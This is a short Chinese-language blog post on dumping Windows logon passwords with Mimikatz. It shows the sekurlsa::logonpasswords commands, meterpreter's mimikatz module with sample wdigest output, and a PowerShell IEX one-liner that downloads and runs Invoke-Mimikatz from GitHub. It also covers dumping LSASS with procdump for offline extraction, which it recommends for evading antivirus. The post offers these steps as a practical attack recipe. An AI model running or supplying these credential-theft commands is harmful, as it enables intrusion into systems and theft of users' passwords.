法一:

  https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813

  使用Mimikatz读取密码

 

第一条:privilege::debug    //提升权限
第二条:sekurlsa::logonpasswords      //抓取密码

 使用Mimikatz读取密码

 

 

注:请以管理员权限!!!

  (什么?要管理员权限!有管理员权限了还要你干嘛....)

 

法二:

  meterreter下已集成了mimikata

  

meterpreter > load mimikatz

使用Mimikatz读取密码

meterpreter > wdigest 
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving wdigest credentials
wdigest credentials

使用Mimikatz读取密码

 

 

法三:

  powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

使用Mimikatz读取密码

 当出现目标机器不能上网的时候也可以就近搭个web服务 然后下载ps1....

 

另一种方法是procdump结合Mimikatz。

好处:免杀

使用Mimikatz读取密码

 

NT6可以使用自带的提取功能

使用Mimikatz读取密码

 

 

mimikatz # sekurlsa::minidump hellolsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords full

 

注:这种需要在目标环境系统与本地mimikatz的运行品台兼容。

相关文章:

  • 2022-01-03
  • 2021-12-28
  • 2022-12-23
  • 2022-12-23
  • 2021-12-13
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-05-30
  • 2022-12-23
  • 2022-12-23
  • 2021-08-13
  • 2021-10-09
  • 2022-03-04
  • 2021-12-15
相关资源
相似解决方案